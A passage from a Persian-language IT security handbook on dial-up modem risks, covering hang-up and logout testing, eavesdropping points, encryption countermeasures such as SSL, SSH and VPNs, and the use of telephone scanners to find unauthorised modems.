ﺑﺘﻮﺍﻧﺪ ﻣﻮﺩﻡ ﺭﺍ ﻃﻮﺭﻱ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻣﺠﺪﺩ ﻛﻨﺪ ﻛﻪ ﺑﺪﻭﻥ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﻗﺮﺍﺭ ﺑﻮﺩﻩ ﺑﺎ ﭼﻪ ﺷﻤﺎﺭﻩ ﺗﻠﻔﻨﻲ ﺗﻤﺎﺱ ﺑﮕﻴﺮﺩ ،ﺑﺎ ﻳﻚ ﺷﻤﺎﺭﻩﺗﻠﻔﻦ
ﺧﺎﺹ ﺩﻳﮕﺮ ﺗﻤﺎﺱ ﺣﺎﺻﻞ ﻛﻨﺪ .ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﺍﺳﺐ ﺗﺮﺍﻭﺍ ﻧﻴﺰ ﻋﻤﻠﻴﺎﺕ ﻛﺎﺭﺑﺮﺍﻥ ﺷﻤﺎ ﺭﺍ ﺩﻧﺒﺎﻝ ﻛﻨﺪ.
ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻣﻮﺩﻡ ﭘﺲ ﺍﺯ ﺧﺮﻭﺝ ﺑﺮﻧﺎﻣﻪ ﺍﺯ ﺣﺎﻓﻈﻪ ﺍﺗﺼﺎﻝ ﺭﺍ ﻗﻄﻊ ﻧﻜﻨﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺷﻮﺩ ﺻﻮﺭﺗﺤﺴﺎﺑﻬﺎﻱ ﺗﻠﻔﻦ ﺑﺴﻴﺎﺭ ﺳﻨﮕﻴﻦ
ﺷﻮﻧﺪ ﻭ ﺍﺯ ﺁﻥ ﻣﻬﻤﺘﺮ ﺍﻳﻨﻜﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﺭﺑﺮﻱ ﻛﻪ ﺩﺭﺣﺎﻝ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺑﻮﺩﻩ ،ﻫﻤﭽﻨﺎﻥ ﺩﺭ ﺁﻥ ﺑﺼﻮﺭﺕ ﻭﺍﺭﺩﺷﺪﻩ ٢٤٥ﺑﺎﻗﻲ
ﺑﻤﺎﻧﺪ ﻭ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻛﺎﺭﺑﺮ ﺑﻌﺪﻱ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮ ﻗﺒﻠﻲ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ.
ﺁﺯﻣﻮﻥ ﭘﺎﺳﺦ
ﺑﺮﺍﻱ ﺁﺯﻣﺎﻳﺶ ﻗﺎﺑﻠﻴﺖ ﭘﺎﺳﺦﺩﻫﻲ ﺭﺍﻳﺎﻧﻪ ،ﺑﻪ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﭘﺎﻳﺎﻧﺔ ﺩﻳﮕﺮ ﺑﺎ ﻳﻚ ﻣﻮﺩﻡ ﺛﺎﻧﻮﻳﻪ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ.
ﺁﺯﻣﺎﻳﺶ ﺭﺍ ﺑﺼﻮﺭﺕ ﺯﻳﺮ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ:
ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ .ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﺎﻳﺪ ﺩﺭ ﭼﻨﺪ ﺯﻧﮓ ﺍﻭﻝ ﺑﻪ ﺗﻤﺎﺱ ﭘﺎﺳﺦ ﺩﻫﺪ ﻭ ﻳﻚ ﭘﻴﻐﺎﻡ ﻭﺭﻭﺩ ٢٤٦ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭﺁﻭﺭﺩ .ﺍﮔﺮ .١
ﻣﻮﺩﻡ ﺷﻤﺎ ﺑﺮﺍﻱ ﻛﺎﺭ ﺑﺎ ﭼﻨﺪ baud-rateﺗﻨﻈﻴﻢ ﺷﺪﻩ ﺑﺎﺷﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﻻﺯﻡ ﺑﺎﺷﺪ ﻳﻚ ﻛﻠﻴﺪ ﺧﺎﺹ )ﻣﻌﻤﻮ ﹰ
ﻻ ﺩﻛﻤﻪﻫﺎﻱ Breakﻳﺎ
(Linefeedﺭﺍ ﭼﻨﺪﺑﺎﺭ ﺑﻔﺸﺎﺭﻳﺪ ﺗﺎ baud-rateﻣﻮﺩ ﹺﻡ ﭘﺎﺳﺦﺩﻫﻨﺪﻩ ،ﺑﺎ ﻣﻮﺩﻣﻲ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺁﻥ ﺗﻤﺎﺱ ﺭﺍ ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩﻩﺍﻳﺪ ﻫﻤﺎﻫﻨﮓ
ﮔﺮﺩﺩ .ﭼﻨﺎﻧﭽﻪ ﺍﺯ ﻣﻮﺩﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﻛﻪ baud-rateﺭﺍ ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺗﻨﻈﻴﻢ ﻣﻲﻛﻨﺪ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻻﺯﻡ ﻧﻴﺴﺖ.
ﻣﻄﺎﺑﻖ ﻣﻌﻤﻮﻝ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﻭﺍﺭﺩ ﻭ ﺳﭙﺲ ﺍﺯ ﺁﻥ ﺧﺎﺭﺝ ﺷﻮﻳﺪ .ﭘﺲ ﺍﺯ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺭﺍﻳﺎﻧﻪ ﺑﺎﻳﺪ ﺗﻤﺎﺱ ﺗﻠﻔﻨﻲ ﺭﺍ ﻗﻄﻊ ﻛﻨﺪ. .٢
ﻣﺠﺪﺩﹰﺍ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ ﻭ ﺑﺎﺭ ﺩﻳﮕﺮ ﺑﻪ ﺁﻥ ﻭﺍﺭﺩ ﺷﻮﻳﺪ ،ﻭ ﺍﻳﻨﺒﺎﺭ ﺍﺭﺗﺒﺎﻁ ﺭﺍ ﺑﺎ ﺑﻴﺮﻭﻥ ﻛﺸﻴﺪﻥ ﺳﻴﻢ ﺗﻠﻔﻦ ﺍﺯ ﻣﻮﺩﻡ .٣
ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﻗﻄﻊ ﻛﻨﻴﺪ .ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻗﻄﻊ ﻧﺎﮔﻬﺎﻧﻲ ﺍﺗﺼﺎﻝ ﺭﺍ ﺷﺒﻴﻪﺳﺎﺯﻱ ﻣﻲﻛﻨﺪ .ﺳﭙﺲ ﺑﺎ ﻫﻤﺎﻥ ﺷﻤﺎﺭﺓ ﻗﺒﻠﻲ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ
ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ .ﺣﺎﻝ ﺑﺎﻳﺪ ﻳﻚ ﭘﻴﻐﺎﻡ ﻭﺭﻭﺩ ﺟﺪﻳﺪ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ ،ﻭ ﺑﻬﻴﭽﻮﺟﻪ ﻧﺒﺎﻳﺪ ﻣﺠﺪﺩﹰﺍ ﺑﻪ ﺍﺩﺍﻣﺔ ﻧﺸﺴﺖ ﻳﺎ ﭘﻮﺳﺘﺔ ﻗﺒﻠﻲ ﺑﺎﺯﮔﺮﺩﻳﺪ؛
ﭼﺮﺍﻛﻪ ﭘﺮﺩﺍﺯﺓ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻥ ﭘﻮﺳﺘﻪ ﺑﺎﻳﺪ ﺑﻼﻓﺎﺻﻠﻪ ﭘﺲ ﺍﺯ ﻗﻄﻊ ﺍﺭﺗﺒﺎﻁ ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻪ ﺑﺎﺷﺪ .ﻭﻗﺘﻲ ﺍﺭﺗﺒﺎﻁ ﺗﻠﻔﻨﻲ ﻗﻄﻊ ﻣﻲﺷﻮﺩ ﺳﻴﺴﺘﻢ
ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﻛﺎﺭﺑﺮ ﺭﺍ ﺍﺯ ﺣﺎﻟﺖ ﻭﺭﻭﺩ ﺧﺎﺭﺝ ﺳﺎﺯﺩ .ﺩﺭ ﻏﻴﺮﺍﻳﻨﺼﻮﺭﺕ ﺍﮔﺮ ﺗﻠﻔﻦ ﺑﻄﻮﺭ ﺍﺗﻔﺎﻗﻲ ﻗﻄﻊ ﺷﻮﺩ ﻭ ﺷﺨﺺ ﺩﻳﮕﺮﻱ ﺑﺎ
ﺭﺍﻳﺎﻧﻪ ﺗﻤﺎﺱ ﺑﮕﻴﺮﺩ ،ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧﺴﺖ ﻣﺸﺎﺑﻪ ﻳﻚ ﻛﺎﺭﺑﺮ ﻣﺠﺎﺯ ﺩﺳﺘﻮﺭﺍﺗﻲ ﺭﺍ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﺩ ،ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﺑﺨﻮﺍﻫﺪ ﺣﺘﻲ ﺑﻪ ﺳﻴﺴﺘﻢ
ﻭﺍﺭﺩ ﺷﻮﺩ ﻭ ﻳﺎ ﺭﻣﺰ ﻋﺒﻮﺭﻱ ﻭﺍﺭﺩ ﻛﻨﺪ.
ﺍﮔﺮ ﭼﻨﺪ ﻣﻮﺩﻡ ﺩﺍﺭﻳﺪ ﻛﻪ ﺑﻪ ﻳﻚ ﮔﺮﻭﻩ ﺍﺯ ﻣﻮﺩﻣﻬﺎ ﻣﺘﺼﻠﻨﺪ )ﺑﺼﻮﺭﺗﻴﻜﻪ ﺍﻭﻟﻴﻦ ﻣﻮﺩﻡ ﺍﺷﻐﺎﻝﻧﺸﺪﻩ ﺑﻪ ﺗﻤﺎﺱ ﺗﻠﻔﻨﻲ ﭘﺎﺳﺦ ﻣﻲﺩﻫﺪ ﻭ ﺗﻤﺎﻣﻲ ﺗﻤﺎﺳﻬﺎ ﺑﻪ .٤
ﻳﻚ ﺷﻤﺎﺭﺓ ﻭﺍﺣﺪ ﺍﻧﺠﺎﻡ ﻣﻲﮔﻴﺮﺩ( ،ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﻳﻦ ﺳﺎﻣﺎﻧﻪ ﺑﺪﺭﺳﺘﻲ ﻋﻤﻞ ﻣﻲﻛﻨﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺪﺭﺳﺘﻲ ﻋﻤﻞ
ﻧﻤﻲﻛﻨﻨﺪ ﻛﻪ ﻧﺘﻴﺠﺔ ﺁﻥ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﮔﺎﻥ ﺣﺘﻲ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺧﻂ ﺑﻌﻀﻲ ﺍﺯ ﻣﻮﺩﻣﻬﺎ ﻣﺸﻐﻮﻝ ﻧﻴﺴﺖ ،ﺑﻮﻕ ﺍﺷﻐﺎﻝ ﺑﺸﻨﻮﻧﺪ.
ﺑﺮﺧﻲ ﺍﺯ ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻫﻨﮕﺎﻡ ﺟﺴﺘﺠﻮ ﺑﺪﻧﺒﺎﻝ ﻣﻮﺩﻡ ﺍﺷﻐﺎﻝﻧﺸﺪﻩ ﺑﻪ ﻳﻚ ﻣﻮﺩﻡ ﺧﺮﺍﺏ ﺑﺮﺳﻨﺪ ،ﺟﺴﺘﺠﻮ ﺭﺍ ﻣﺘﻮﻗﻒ
ﻣﻲﻛﻨﻨﺪ ﻭ ﺑﺪﻳﻦﺗﺮﺗﻴﺐ ﺳﺎﻳﺮ ﻣﻮﺩﻣﻬﺎﻱ ﮔﺮﻭﻩ ﻫﻤﻮﺍﺭﻩ ﺑﻼﺍﺳﺘﻔﺎﺩﻩ ﺧﻮﺍﻫﻨﺪ ﻣﺎﻧﺪ.
ﺍﻧﻮﺍﻉ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ
ﺩﺭ ﻳﻚ ﻣﻜﺎﻟﻤﺔ ﺗﻠﻔﻨﻲ ﺭﻭﻱ ﻳﻚ ﻣﻮﺩﻡ ﺍﺳﺎﺳﹰﺎ ﺷﺶ ﻧﻘﻄﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻮﺭﺩ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ .ﺩﺭ ﻃﺮﻑ ﺷﻤﺎ ﻣﻬﺎﺟﻢ
ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺿﺒﻂ ﺻﻮﺕ ﻭ ﻳﺎ ﻳﻚ ﻣﻮﺩﻡ ﺩﻳﮕﺮ ﺑﺼﻮﺭﺕ ﻣﻮﺍﺯﻱ ﺑﺎ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺷﻤﺎ ﻗﺮﺍﺭ ﺩﻫﺪ .ﻛﻤﻲ ﺁﻧﻄﺮﻓﺘﺮ ﺧﺎﺭﺝ ﺍﺯ ﭘﻨﺠﺮﻩ
ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺘﻮﺍﻥ ﺑﺎ ﺗﺤﻠﻴﻞ ﭼﺸﻤﻚﺯﺩﻧﻬﺎﻱ ﭼﺮﺍﻍ ﺍﺭﺳﺎﻝ ﻭ ﺩﺭﻳﺎﻓﺖ ﺩﺍﺩﺓ ﻣﻮﺩﻡ ،ﺍﻃﻼﻋﺎﺕ ﻣﻨﺘﻘﻞ ﺷﺪﻩ ﺍﺯ ﻃﺮﻳﻖ ﺁﻧﺮﺍ
ﻣﺸﺨﺺ ﻛﺮﺩ .ﻣﻴﺎﻥ ﻣﺤﻞ ﺍﺳﺘﻘﺮﺍﺭ ﺷﻤﺎ ﻭ ﺩﻓﺘﺮ ﻣﺮﻛﺰﻱ ﺷﺮﻛﺖ ﻣﺨﺎﺑﺮﺍﺕ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺳﻴﻤﻬﺎ ﻳﻚ ﺷﺎﺧﺔ ﺍﺿﺎﻓﻪ ﺧﺎﺭﺝ ﺷﻮﺩ .ﺩﺭ ﻣﺮﻛﺰ
ﺳﻮﺋﻴﭻ ﺷﺮﻛﺖ ﻣﺨﺎﺑﺮﺍﺕ ،ﻳﻚ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻓﺮﺳﺘﻨﺪﺓ ﻏﻴﺮﻗﺎﺑﻞ ﺭﺩﻳﺎﺑﻲ ﺑﻪ ﺳﻮﺋﻴﭻ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺘﺼﻞ ﻭ ﻳﺎ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﻳﻚ
ﺳﻴﻢ ﺭﻭﻱ ﺳﻮﺋﻴﭻ ﻧﺼﺐ ﻧﻤﺎﻳﺪ .ﭼﻨﺎﻧﭽﻪ ﺗﻤﺎﺱ ﺗﻠﻔﻨﻲ ﺍﺯ ﻃﺮﻳﻖ ﻣﺎﻫﻮﺍﺭﻩ ﻭ ﻳﺎ ﺍﻣﻮﺍﺝ ﻣﺎﻳﻜﺮﻭﻭﻳﻮ ﻣﺴﻴﺮﻳﺎﺑﻲ ﺷﻮﺩ ،ﺍﻳﻦ ﺍﻣﻮﺍﺝ ﺭﺍﺩﻳﻮﻳﻲ ﺭﺍ
ﻣﻲﺗﻮﺍﻥ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﺮﺩ؛ ﻭ ﺩﺭﻧﻬﺎﻳﺖ ﺍﻳﻨﻜﻪ ﺩﺭ ﻣﻘﺼﺪ ﺗﻤﺎﺱ ﺗﻠﻔﻨﻲ ﻣﻲﺗﻮﺍﻥ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻧﺼﺐ ﻧﻤﻮﺩ.
ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ
ﺍﻗﺪﺍﻣﺎﺕ ﻣﺨﺘﻠﻔﻲ ﺑﺎ ﺩﺭﺟﺎﺕ ﺍﺛﺮﮔﺬﺍﺭﻱ ﻣﺘﻔﺎﻭﺗﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﺁﻧﻬﺎ ﺑﻬﺮﻩ ﺑﮕﻴﺮﻳﺪ:
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩ ﺣﻔﺎﻇﺖ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺯ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫﻤﻮﺍﺭﻩ ﻓﺮﺽ ﻛﻨﻴﺪ ﺍﺑﺰﺍﺭ ﺍﺭﺗﺒﺎﻃﻲ ﺷﻤﺎ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻭ ﺑﻌﻨﻮﺍﻥ
ﻳﻚ ﺍﻗﺪﺍﻡ ﭘﻴﺸﮕﻴﺮﺍﻧﻪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺷﻨﻮﺩ ،ﺗﻤﺎﻣﻲ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻨﻴﺪ .ﺍﮔﺮ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﺍﺭﺗﺒﺎﻁ ﺗﻠﻔﻨﻲ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﺜﻞ SSLﻭ SSHﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﻳﻚ ﻣﺎﻧﻊ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻪ ﺍﺯ ﺳﻴﺴﺘﻢ
ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺗﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍﻩ ﺩﻭﺭ ﻛﺸﻴﺪﻩ ﺷﺪﻩ ﺍﺳﺖ ﺍﻳﺠﺎﺩ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ .ﺳﻴﺴﺘﻤﻬﺎﻱ VPNﻣﺎﻧﻨﺪ ﭘﺮﻭﺗﻜﻞ ﺗﻮﻧﻞﻛﺸﻲ ﻧﻘﻄﻪ ﺑﻪ
ﻧﻘﻄﻪ (PPTP) ٢٤٨ﻭ IPSecﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺗﻤﺎﻣﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻭ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ﺑﻜﺎﺭ ﺭﻭﻧﺪ.
ﭼﻨﺪ ﺳﺎﻝ ﻗﺒﻞ ﺗﻠﻔﻨﻬﺎ ﻭ ﻳﺎ ﻣﻮﺩﻣﻬﺎﻳﻲ ﻛﻪ ﻗﺎﺑﻠﻴﺖ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺩﺍﺷﺘﻨﺪ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺧﺎﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺖ ﻭ ﻗﻴﻤﺖ ﺁﻧﻬﺎ ﻧﻴﺰ ﺑﻴﺶ ﺍﺯ
ﻫﺰﺍﺭ ﺩﻻﺭ ﺑﻮﺩ ،ﺍﻣﺎ ﺍﻣﺮﻭﺯﻩ ﺩﺳﺘﮕﺎﻫﻬﺎﻳﻲ ﺑﺎ ﻗﻴﻤﺖ ﻛﻤﺘﺮ ﺍﺯ ٣٠٠ﺩﻻﺭ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻌﻨﻮﺍﻥ ﻭﺍﺳﻂ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﻪ ﻭ ﻣﻮﺩﻡ ﻗﺮﺍﺭ
ﮔﻴﺮﻧﺪ ﻭ ﻳﻚ ﺍﺭﺗﺒﺎﻁ ﺗﻠﻔﻨﻲ ﺭﻣﺰﻧﮕﺎﺭﻱﺷﺪﺓ ﺍﻳﻤﻦ ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪ .ﺑﻴﺸﺘﺮ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺮ ﺍﺳﺎﺱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻭ
ﻛﺎﺭﺑﺮ ﺳﻴﺴﺘﻢ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﻫﺮ ﻛﺎﺭﺑﺮ ﻳﻚ ﻛﻠﻴﺪ ﺟﺪﺍﮔﺎﻧﻪ ﺑﻔﺮﺳﺘﺪ .ﺩﺭ ﻋﻤﻞ ﭼﻨﻴﻦ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺍﻛﺜﺮ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻣﺸﻜﻠﻲ
ﺍﻳﺠﺎﺩ ﻧﻤﻲﻛﻨﺪ .ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺗﻌﺪﺍﺩ ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻋﻠﻴﺮﻏﻢ ﭘﺪﻳﺪ ﺁﻭﺭﺩﻥ ﻳﻚ ﺳﻄﺢ ﻛﺎﺭﺁ ﺍﺯ
247 Sweep
248 Point-to-point tunneling protocol
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٨٦
ﺍﻳﻤﻨﻲ ،ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻧﻴﺰ ﺳﺎﺩﻩ ﺍﺳﺖ .ﻫﻤﭽﻨﻴﻦ ﻣﻮﺩﻣﻬﺎﻳﻲ ﺑﺎ ﻗﻴﻤﺖ ﻣﻨﺎﺳﺐ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺍﺭﺍﻱ ﺗﻮﺍﺑﻊ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺍﺧﻠﻲ ﻫﺴﺘﻨﺪ ﻭ
ﺑﺮﺍﻱ ﻛﺎﺭ ﻧﻴﺎﺯﻣﻨﺪ ﻫﻴﭻ ﻗﻄﻌﺔ ﺧﺎﺹ ﺩﻳﮕﺮﻱ ﻧﻤﻲﺑﺎﺷﻨﺪ.
ﭘﻮﻳﺶ ﺗﻠﻔﻨﻲ
ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻣﻮﺩﻣﻬﺎﻱ ﻧﺎﺷﻨﺎﺧﺘﻪ ﻭ ﻏﻴﺮﻣﺠﺎﺯ ﺍﺯ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﭘﻮﻳﺸﮕﺮ ﺗﻠﻔﻦ ﺑﻬﺮﻩ ﺑﮕﻴﺮﻳﺪ .ﭘﻮﻳﺸﮕﺮ ﺗﻠﻔﻦ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ
ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺩﺭ ﻳﻚ ﻣﺤﺪﻭﺩﺓ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴﻴﻦﺷﺪﻩ ﺑﺎ ﺗﻤﺎﻡ ﺷﻤﺎﺭﻩﻫﺎ ﺗﻤﺎﺱ ﻣﻲﮔﻴﺮﺩ ﻭ ﭘﻴﻐﺎﻡ ﻭﺭﻭﺩ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺎﺳﺦﺩﻫﻨﺪﻩ ﺭﺍ ﺛﺒﺖ
ﻣﻲﻛﻨﺪ .ﺑﺮﺧﻲ ﺍﺯ ﭘﻮﻳﺸﮕﺮﻫﺎﻱ ﺗﻠﻔﻦ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﮕﻮﻧﻪﺍﻱ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻛﺮﺩ ﻛﻪ ﺳﻌﻲ ﻛﻨﻨﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻓﻬﺮﺳﺖ ﺍﺯ ﻧﺎﻣﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ
ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴﻴﻦﺷﺪﻩ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ ﻧﻔﻮﺫ ﻧﻤﺎﻳﻨﺪ .ﭘﻮﻳﺸﮕﺮﻫﺎﻱ ﺗﻠﻔﻦ ﺑﺼﻮﺭﺕ ﺭﺍﻳﮕﺎﻥ ﻭ ﺗﺠﺎﺭﻱ
ﻭ ﺑﺎ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺑﺮﺧﻲ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺸﺎﻭﺭ ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﭘﻮﻳﺶ ﺗﻠﻔﻦ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﺑﺨﺸﻲ ﺍﺯ ﻳﻚ ﻋﻤﻠﻴﺎﺕ
ﻣﻤﻴﺰﻱ ﺍﻣﻨﻴﺖ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ.
